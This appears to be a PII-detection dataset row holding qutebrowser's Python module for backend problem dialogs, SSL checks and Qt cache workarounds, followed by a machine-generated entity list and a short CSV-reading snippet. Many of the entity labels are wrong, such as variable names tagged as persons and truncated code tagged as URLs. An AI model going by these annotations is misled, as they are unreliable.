'version.py'], ['URL', 'cfg.ve'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'f.re'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'sys.ar']]" +109,"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: + +# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com +# +# This file is part of qutebrowser. +# +# qutebrowser is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# qutebrowser is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with qutebrowser. If not, see . 
+ +""""""Dialogs shown when there was a problem with a backend choice."""""" + +import os +import sys +import functools +import html +import enum +import shutil +import argparse +import dataclasses +from typing import Any, List, Sequence, Tuple, Optional + +from PyQt5.QtCore import Qt +from PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel, + QMessageBox, QWidget) +from PyQt5.QtNetwork import QSslSocket + +from qutebrowser.config import config, configfiles +from qutebrowser.utils import (usertypes, version, qtutils, log, utils, + standarddir) +from qutebrowser.misc import objects, msgbox, savemanager, quitter + + +class _Result(enum.IntEnum): + + """"""The result code returned by the backend problem dialog."""""" + + quit = QDialog.Accepted + 1 + restart = QDialog.Accepted + 2 + restart_webkit = QDialog.Accepted + 3 + restart_webengine = QDialog.Accepted + 4 + + +@dataclasses.dataclass +class _Button: + + """"""A button passed to BackendProblemDialog."""""" + + text: str + setting: str + value: Any + default: bool = False + + +def _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]: + """"""Get the other backend enum/setting for a given backend."""""" + other_backend = { + usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine, + usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit, + }[backend] + other_setting = other_backend.name.lower()[2:] + return (other_backend, other_setting) + + +def _error_text(because: str, text: str, backend: usertypes.Backend) -> str: + """"""Get an error text for the given information."""""" + other_backend, other_setting = _other_backend(backend) + if other_backend == usertypes.Backend.QtWebKit: + warning = (""Note that QtWebKit hasn't been updated since "" + ""July 2017 (including security updates)."") + suffix = "" (not recommended)"" + else: + warning = """" + suffix = """" + return (""Failed to start with the {backend} backend!"" + ""

    qutebrowser tried to start with the {backend} backend but "" + ""failed because {because}. {text}"" + ""Forcing the {other_backend.name} backend{suffix}: "" + ""This forces usage of the {other_backend.name} backend by "" + ""setting the backend = '{other_setting}' option "" + ""(if you have a config.py file, you'll need to set "" + ""this manually). {warning}
    "".format( + backend=backend.name, because=because, text=text, + other_backend=other_backend, other_setting=other_setting, + warning=warning, suffix=suffix)) + + +class _Dialog(QDialog): + + """"""A dialog which gets shown if there are issues with the backend."""""" + + def __init__(self, *, because: str, + text: str, + backend: usertypes.Backend, + buttons: Sequence[_Button] = None, + parent: QWidget = None) -> None: + super().__init__(parent) + vbox = QVBoxLayout(self) + + other_backend, other_setting = _other_backend(backend) + text = _error_text(because, text, backend) + + label = QLabel(text) + label.setWordWrap(True) + label.setTextFormat(Qt.RichText) + vbox.addWidget(label) + + hbox = QHBoxLayout() + buttons = [] if buttons is None else buttons + + quit_button = QPushButton(""Quit"") + quit_button.clicked.connect(lambda: self.done(_Result.quit)) + hbox.addWidget(quit_button) + + backend_text = ""Force {} backend"".format(other_backend.name) + if other_backend == usertypes.Backend.QtWebKit: + backend_text += ' (not recommended)' + backend_button = QPushButton(backend_text) + backend_button.clicked.connect(functools.partial( + self._change_setting, 'backend', other_setting)) + hbox.addWidget(backend_button) + + for button in buttons: + btn = QPushButton(button.text) + btn.setDefault(button.default) + btn.clicked.connect(functools.partial( + self._change_setting, button.setting, button.value)) + hbox.addWidget(btn) + + vbox.addLayout(hbox) + + def _change_setting(self, setting: str, value: str) -> None: + """"""Change the given setting and restart."""""" + config.instance.set_obj(setting, value, save_yaml=True) + + if setting == 'backend' and value == 'webkit': + self.done(_Result.restart_webkit) + elif setting == 'backend' and value == 'webengine': + self.done(_Result.restart_webengine) + else: + self.done(_Result.restart) + + +@dataclasses.dataclass +class _BackendImports: + + """"""Whether backend modules could be imported."""""" + + webkit_error: Optional[str] = None + webengine_error: Optional[str] = None + + +class _BackendProblemChecker: + + """"""Check for various backend-specific issues."""""" + + def __init__(self, *, + no_err_windows: bool, + save_manager: savemanager.SaveManager) -> None: + self._save_manager = save_manager + self._no_err_windows = no_err_windows + + def _show_dialog(self, *args: Any, **kwargs: Any) -> None: + """"""Show a dialog for a backend problem."""""" + if self._no_err_windows: + text = _error_text(*args, **kwargs) + print(text, file=sys.stderr) + sys.exit(usertypes.Exit.err_init) + + dialog = _Dialog(*args, **kwargs) + + status = dialog.exec() + self._save_manager.save_all(is_exit=True) + + if status in [_Result.quit, QDialog.Rejected]: + pass + elif status == _Result.restart_webkit: + quitter.instance.restart(override_args={'backend': 'webkit'}) + elif status == _Result.restart_webengine: + quitter.instance.restart(override_args={'backend': 'webengine'}) + elif status == _Result.restart: + quitter.instance.restart() + else: + raise utils.Unreachable(status) + + sys.exit(usertypes.Exit.err_init) + + def _nvidia_shader_workaround(self) -> None: + """"""Work around QOpenGLShaderProgram issues. + + See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826 + """""" + self._assert_backend(usertypes.Backend.QtWebEngine) + utils.libgl_workaround() + + def _xwayland_options(self) -> Tuple[str, List[_Button]]: + """"""Get buttons/text for a possible XWayland solution."""""" + buttons = [] + text = ""

    You can work around this in one of the following ways:
    "" + + if 'DISPLAY' in os.environ: + # XWayland is available, but QT_QPA_PLATFORM=wayland is set + buttons.append( + _Button(""Force XWayland"", 'qt.force_platform', 'xcb')) + text += (""

    Force Qt to use XWayland: "" + ""This allows you to use the newer QtWebEngine backend "" + ""(based on Chromium). "" + ""This sets the qt.force_platform = 'xcb' option "" + ""(if you have a config.py file, you'll need to "" + ""set this manually).
    "") + else: + text += (""

    Set up XWayland: "" + ""
    This allows you to use the newer QtWebEngine backend "" + ""(based on Chromium). "") + + return text, buttons + + def _handle_wayland_webgl(self) -> None: + """"""On older graphic hardware, WebGL on Wayland causes segfaults. + + See https://github.com/qutebrowser/qutebrowser/issues/5313 + """""" + self._assert_backend(usertypes.Backend.QtWebEngine) + + if os.environ.get('QUTE_SKIP_WAYLAND_WEBGL_CHECK'): + return + + platform = objects.qapp.platformName() + if platform not in ['wayland', 'wayland-egl']: + return + + # Only Qt 5.14 should be affected + if not qtutils.version_check('5.14', compiled=False): + return + if qtutils.version_check('5.15', compiled=False): + return + + # Newer graphic hardware isn't affected + opengl_info = version.opengl_info() + if (opengl_info is None or + opengl_info.gles or + opengl_info.version is None or + opengl_info.version >= (4, 3)): + return + + # If WebGL is turned off, we're fine + if not config.val.content.webgl: + return + + text, buttons = self._xwayland_options() + + buttons.append(_Button(""Turn off WebGL (recommended)"", + 'content.webgl', + False)) + text += (""

    Disable WebGL (recommended): "" + ""This sets the content.webgl = False option "" + ""(if you have a config.py file, you'll need to "" + ""set this manually).
    "") + + self._show_dialog(backend=usertypes.Backend.QtWebEngine, + because=(""of frequent crashes with Qt 5.14 on "" + ""Wayland with older graphics hardware""), + text=text, + buttons=buttons) + + def _try_import_backends(self) -> _BackendImports: + """"""Check whether backends can be imported and return BackendImports."""""" + # pylint: disable=unused-import + results = _BackendImports() + + try: + from PyQt5 import QtWebKit + from PyQt5.QtWebKit import qWebKitVersion + from PyQt5 import QtWebKitWidgets + except (ImportError, ValueError) as e: + results.webkit_error = str(e) + else: + if not qtutils.is_new_qtwebkit(): + results.webkit_error = ""Unsupported legacy QtWebKit found"" + + try: + from PyQt5 import QtWebEngineWidgets + except (ImportError, ValueError) as e: + results.webengine_error = str(e) + + return results + + def _handle_ssl_support(self, fatal: bool = False) -> None: + """"""Check for full SSL availability. + + If ""fatal"" is given, show an error and exit. + """""" + if QSslSocket.supportsSsl(): + return + + if qtutils.version_check('5.12.4'): + version_text = (""If you use OpenSSL 1.0 with a PyQt package from "" + ""PyPI (e.g. on Ubuntu 16.04), you will need to "" + ""build OpenSSL 1.1 from sources and set "" + ""LD_LIBRARY_PATH accordingly."") + else: + version_text = (""If you use OpenSSL 1.1 with a PyQt package from "" + ""PyPI (e.g. on Archlinux or Debian Stretch), you "" + ""need to set LD_LIBRARY_PATH to the path of "" + ""OpenSSL 1.0 or use Qt >= 5.12.4."") + + text = (""Could not initialize QtNetwork SSL support. {} This only "" + ""affects downloads and :adblock-update."".format(version_text)) + + if fatal: + errbox = msgbox.msgbox(parent=None, + title=""SSL error"", + text=""Could not initialize SSL support."", + icon=QMessageBox.Critical, + plain_text=False) + errbox.exec() + sys.exit(usertypes.Exit.err_init) + + assert not fatal + log.init.warning(text) + + def _check_backend_modules(self) -> None: + """"""Check for the modules needed for QtWebKit/QtWebEngine."""""" + imports = self._try_import_backends() + + if not imports.webkit_error and not imports.webengine_error: + return + elif imports.webkit_error and imports.webengine_error: + text = (""

    qutebrowser needs QtWebKit or QtWebEngine, but "" + ""neither could be imported! "" + ""The errors encountered were: "" + ""• QtWebKit: {webkit_error} "" + ""• QtWebEngine: {webengine_error}
    "".format( + webkit_error=html.escape(imports.webkit_error), + webengine_error=html.escape(imports.webengine_error))) + errbox = msgbox.msgbox(parent=None, + title=""No backend library found!"", + text=text, + icon=QMessageBox.Critical, + plain_text=False) + errbox.exec() + sys.exit(usertypes.Exit.err_init) + elif objects.backend == usertypes.Backend.QtWebKit: + if not imports.webkit_error: + return + self._show_dialog( + backend=usertypes.Backend.QtWebKit, + because=""QtWebKit could not be imported"", + text=""

    The error encountered was: {}
    "".format( + html.escape(imports.webkit_error)) + ) + elif objects.backend == usertypes.Backend.QtWebEngine: + if not imports.webengine_error: + return + self._show_dialog( + backend=usertypes.Backend.QtWebEngine, + because=""QtWebEngine could not be imported"", + text=""

    The error encountered was: {}
    "".format( + html.escape(imports.webengine_error)) + ) + + raise utils.Unreachable + + def _handle_cache_nuking(self) -> None: + """"""Nuke the QtWebEngine cache if the Qt version changed. + + WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532 + """""" + if not configfiles.state.qt_version_changed: + return + + # Only nuke the cache in cases where we know there are problems. + # It seems these issues started with Qt 5.12. + # They should be fixed with Qt 5.12.5: + # https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408 + if qtutils.version_check('5.12.5', compiled=False): + return + + log.init.info(""Qt version changed, nuking QtWebEngine cache"") + cache_dir = os.path.join(standarddir.cache(), 'webengine') + if os.path.exists(cache_dir): + shutil.rmtree(cache_dir) + + def _handle_serviceworker_nuking(self) -> None: + """"""Nuke the service workers directory if the Qt version changed. + + WORKAROUND for: + https://bugreports.qt.io/browse/QTBUG-72532 + https://bugreports.qt.io/browse/QTBUG-82105 + """""" + if ('serviceworker_workaround' not in configfiles.state['general'] and + qtutils.version_check('5.14', compiled=False)): + # Nuke the service worker directory once for every install with Qt + # 5.14, given that it seems to cause a variety of segfaults. + configfiles.state['general']['serviceworker_workaround'] = '514' + affected = True + else: + # Otherwise, just nuke it when the Qt version changed. + affected = configfiles.state.qt_version_changed + + if not affected: + return + + service_worker_dir = os.path.join(standarddir.data(), 'webengine', + 'Service Worker') + bak_dir = service_worker_dir + '-bak' + if not os.path.exists(service_worker_dir): + return + + log.init.info(""Qt version changed, removing service workers"") + + # Keep one backup around - we're not 100% sure what persistent data + # could be in there, but this folder can grow to ~300 MB. 
+ if os.path.exists(bak_dir): + shutil.rmtree(bak_dir) + + shutil.move(service_worker_dir, bak_dir) + + def _assert_backend(self, backend: usertypes.Backend) -> None: + assert objects.backend == backend, objects.backend + + def check(self) -> None: + """"""Run all checks."""""" + self._check_backend_modules() + if objects.backend == usertypes.Backend.QtWebEngine: + self._handle_ssl_support() + self._nvidia_shader_workaround() + self._handle_wayland_webgl() + self._handle_cache_nuking() + self._handle_serviceworker_nuking() + else: + self._assert_backend(usertypes.Backend.QtWebKit) + self._handle_ssl_support(fatal=True) + + +def init(*, args: argparse.Namespace, + save_manager: savemanager.SaveManager) -> None: + """"""Run all checks."""""" + checker = _BackendProblemChecker(no_err_windows=args.no_err_windows, + save_manager=save_manager) + checker.check() +",17433,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'sw=4'], ['DATE_TIME', '2017-2021'], ['PERSON', 'Florian Bruhin'], ['LOCATION', 'qutebrowser'], ['PERSON', 'qutebrowser'], ['PERSON', 'QPushButton'], ['LOCATION', 'configfiles'], ['PERSON', 'standarddir'], ['LOCATION', 'Result(enum'], ['DATE_TIME', 'July 2017'], ['PERSON', 'vbox'], ['PERSON', 'hbox'], ['PERSON', 'quit_button'], ['LOCATION', 'wayland'], ['LOCATION', 'Wayland'], ['DATE_TIME', 'Only Qt 5.14'], ['PERSON', ""qtutils.version_check('5.15""], ['DATE_TIME', '5.14'], ['LOCATION', 'Wayland'], ['NRP', 'PyQt'], ['NRP', 'PyQt'], ['PERSON', 'text=""Could'], ['DATE_TIME', '5.14'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826'], ['URL', 'https://github.com/qutebrowser/qutebrowser/issues/5313'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-82105'], ['URL', 'email.com'], ['URL', 'qutebrowser.co'], ['URL', 'enum.Int'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'backend.na'], ['URL', 'config.py'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'label.se'], ['URL', 'label.se'], ['URL', 'vbox.ad'], ['URL', 'button.clicked.co'], ['URL', 'self.do'], ['URL', 'hbox.ad'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'button.clicked.co'], ['URL', 'functools.pa'], ['URL', 'hbox.ad'], ['URL', 'btn.se'], ['URL', 'button.de'], ['URL', 'btn.clicked.co'], ['URL', 'functools.pa'], ['URL', 'button.se'], ['URL', 'button.va'], ['URL', 'hbox.ad'], ['URL', 'vbox.ad'], ['URL', 'config.instance.se'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'savemanager.Sa'], ['URL', 'sys.st'], ['URL', 'usertypes.Exit.er'], ['URL', 'manager.sa'], ['URL', 'QDialog.Re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'usertypes.Exit.er'], ['URL', 'usertypes.Ba'], ['URL', 'utils.li'], ['URL', 'qt.fo'], ['URL', 'qt.fo'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'os.environ.ge'], ['URL', 'objects.qapp.pl'], ['URL', 
'qtutils.ve'], ['URL', 'qtutils.ve'], ['URL', 'info.gl'], ['URL', 'info.ve'], ['URL', 'info.ve'], ['URL', 'config.val.co'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'qtutils.is'], ['URL', 'QSslSocket.su'], ['URL', 'qtutils.ve'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'log.in'], ['URL', 'html.es'], ['URL', 'html.es'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'log.init.in'], ['URL', 'os.path.jo'], ['URL', 'standarddir.ca'], ['URL', 'os.pa'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'configfiles.st'], ['URL', 'configfiles.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'log.init.in'], ['URL', 'os.pa'], ['URL', 'shutil.mo'], ['URL', 'usertypes.Ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'argparse.Na'], ['URL', 'savemanager.Sa'], ['URL', 'args.no'], ['URL', 'checker.ch']]"
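A minimal sketch for consuming the rows of this dataset (the four-column layout, index, content, length, detected elements, is inferred from the row shape above; the filename is an assumption):

import ast
import csv

with open('entity_list.csv', newline='', encoding='utf-8') as fh:
    for row in csv.reader(fh):
        # data rows carry four fields: index, content, length, elements
        if len(row) != 4 or not row[0].isdigit():
            continue
        idx, content, length, elements = row
        # the last column is a Python-literal list of [label, value] pairs
        pairs = ast.literal_eval(elements)
        print(idx, length, len(pairs))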